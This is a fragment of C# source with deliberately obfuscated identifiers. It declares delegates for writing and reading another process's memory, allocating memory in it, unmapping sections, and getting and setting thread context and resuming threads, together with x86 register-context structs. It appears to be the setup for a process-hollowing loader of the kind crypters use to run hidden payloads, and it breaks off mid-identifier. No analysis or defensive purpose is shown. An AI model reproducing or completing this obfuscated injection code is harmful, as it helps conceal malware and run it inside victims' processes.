[In] ref rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmm startup,
|
|
||||||
out rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmm info);
|
|
||||||
|
|
||||||
public delegate bool JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUha(
|
|
||||||
IntPtr process,
|
|
||||||
IntPtr address,
|
|
||||||
byte[] buffer,
|
|
||||||
IntPtr size,
|
|
||||||
out int written);
|
|
||||||
|
|
||||||
public delegate int JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUga(
|
|
||||||
IntPtr process,
|
|
||||||
IntPtr address,
|
|
||||||
ref IntPtr buffer,
|
|
||||||
IntPtr size,
|
|
||||||
ref int read);
|
|
||||||
|
|
||||||
public delegate IntPtr JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU3(
|
|
||||||
IntPtr process,
|
|
||||||
IntPtr address,
|
|
||||||
uint size,
|
|
||||||
uint type,
|
|
||||||
uint protect);
|
|
||||||
|
|
||||||
public delegate long JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU2(
|
|
||||||
IntPtr process,
|
|
||||||
IntPtr address);
|
|
||||||
|
|
||||||
public delegate uint JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU1(
|
|
||||||
IntPtr thread);
|
|
||||||
|
|
||||||
public delegate bool JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU9(
|
|
||||||
IntPtr thread,
|
|
||||||
ref rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU context);
|
|
||||||
|
|
||||||
public delegate bool JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU5(
|
|
||||||
IntPtr thread,
|
|
||||||
ref rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU context);
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public class JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm
|
|
||||||
{
|
|
||||||
public struct JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU
|
|
||||||
{
|
|
||||||
public uint Flags;
|
|
||||||
public uint D0;
|
|
||||||
public uint D1;
|
|
||||||
public uint D2;
|
|
||||||
public uint D3;
|
|
||||||
public uint D6;
|
|
||||||
public uint D7;
|
|
||||||
public rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU46 Save;
|
|
||||||
public uint SG;
|
|
||||||
public uint SF;
|
|
||||||
public uint SE;
|
|
||||||
public uint SD;
|
|
||||||
public uint Edi;
|
|
||||||
public uint Esi;
|
|
||||||
public uint Ebx;
|
|
||||||
public uint Edx;
|
|
||||||
public uint Ecx;
|
|
||||||
public uint Eax;
|
|
||||||
public uint Ebp;
|
|
||||||
public uint Eip;
|
|
||||||
public uint SC;
|
|
||||||
public uint EFlags;
|
|
||||||
public uint Esp;
|
|
||||||
public uint SS;
|
|
||||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
|
|
||||||
public byte[] Registers;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU46
|
|
||||||
{
|
|
||||||
public uint Control;
|
|
||||||
public uint Status;
|
|
||||||
public uint Tag;
|
|
||||||
public uint ErrorO;
|
|
||||||
public uint ErrorS;
|
|
||||||
public uint DataO;
|
|
||||||
public uint DataS;
|
|
||||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
|
|
||||||
public byte[] RegisterArea;
|
|
||||||
public uint State;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU41
|
|
||||||
{
|
|
||||||
public uint Address;
|
|
||||||
public uint Size;
|
|
||||||
}
|
|
||||||
|
|
||||||
public struct JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmm
|
|
||||||
{
|
|
||||||
public byte Name;
|
|
||||||
public rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADI